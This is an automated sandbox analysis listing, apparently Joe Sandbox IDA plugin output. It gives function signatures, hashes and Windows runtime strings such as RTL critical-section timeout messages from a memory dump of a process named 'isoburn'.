                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 99e32103033cb5cd5bd5d1985aca30542789fc4a05ef8f26f309d6e6cf2365d1
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 04819171E3924A9EDF28CF68C8957FEBBA2BF45330F184159DCA7A7290C77498448B50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 3d0b0251abcb917d55219d72bf39823ae1f337d82bca83ccf28e2a31cfc43be3
                                                          • Instruction ID: 760966eb40cd9befe75bd682698d2089977d5cd94ec476a52a763f833724d82a
                                                          • Opcode Fuzzy Hash: 3d0b0251abcb917d55219d72bf39823ae1f337d82bca83ccf28e2a31cfc43be3
                                                          • Instruction Fuzzy Hash: 4421957AA20219EBCB10DF79CC44AFEBBF9EF54654F04015AE945E3242EB70D9018BA0
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 0528031E
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052802BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052802E7
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: e9301dae25ddbd0adda8ac6825de34dd5939a2c266ef7eb655188c3180f4c609
                                                          • Instruction ID: 6be12c876125b0f39294c5d2c8cdf2ef01b1487cdf148e4580170d3c12f1e2f5
                                                          • Opcode Fuzzy Hash: e9301dae25ddbd0adda8ac6825de34dd5939a2c266ef7eb655188c3180f4c609
                                                          • Instruction Fuzzy Hash: 73E10570A28742DFD724DF28D989B2AB7E1BF44324F140A6DF469872D0D778E844CB42
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 05287BAC
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05287B7F
                                                          • RTL: Resource at %p, xrefs: 05287B8E
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 6a1b66321f5bc68f2a5c9d52bfcf219b1e193d4caf2188b378156ac2ef41325f
                                                          • Instruction ID: 55c69e8bebe82901fa3b35730342a465b751b1a139e4a58a7926697014b18ca0
                                                          • Opcode Fuzzy Hash: 6a1b66321f5bc68f2a5c9d52bfcf219b1e193d4caf2188b378156ac2ef41325f
                                                          • Instruction Fuzzy Hash: D441EF317257029FCB29DE24C940B2AB7E6FF88720F140A1DF95ADB280DB71E8058F91
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0528728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 052872C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05287294
                                                          • RTL: Resource at %p, xrefs: 052872A3
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: e4b7c5b687fa131afda20a611b68e998112d8637f4960653662e65f068083c8c
                                                          • Instruction ID: 716895163e863a8e16b6ca2f4c3f815fc1b5c88b1c0e630c55e52b37423c35d5
                                                          • Opcode Fuzzy Hash: e4b7c5b687fa131afda20a611b68e998112d8637f4960653662e65f068083c8c
                                                          • Instruction Fuzzy Hash: BA41D035725202ABDB25EE64CC41F66B7A5FF44710F240619F959DB280DB32E852CBD0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 093cb9d126de8856fe0f4c83c4552b8d24d4df278fc6b217b0613627b6f658b6
                                                          • Instruction ID: 4f9331668851f59adaa6c690fc340e4a4778fa2dcde98ad97d223ced4d5d2f95
                                                          • Opcode Fuzzy Hash: 093cb9d126de8856fe0f4c83c4552b8d24d4df278fc6b217b0613627b6f658b6
                                                          • Instruction Fuzzy Hash: 17316876620219DFCB24DE29CC44BEEB7B8FF44610F5445DAE889E3241EF309A549BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 2365c6d8e54386b8e3b50609d849130a8ca5013da62454fed10303df6da86d11
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: D191A370EA42179BDF24DE69C880ABEB7A6FF443B0F68452AFC59E72C0D77099418750
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 48ecb43d87627cfc617c449d2a002e5f6e6e2467a366191e2ed66b4c7245cb79
                                                          • Instruction ID: f2e1c17f7b7c149dbd3556e0fbabee4f938303c821330ae900510cfadfac7db9
                                                          • Opcode Fuzzy Hash: 48ecb43d87627cfc617c449d2a002e5f6e6e2467a366191e2ed66b4c7245cb79
                                                          • Instruction Fuzzy Hash: 5D810976D20269DBDB25CB54CC59BEAB7B9AF08710F0041EAE91DB7240D7709E84CFA4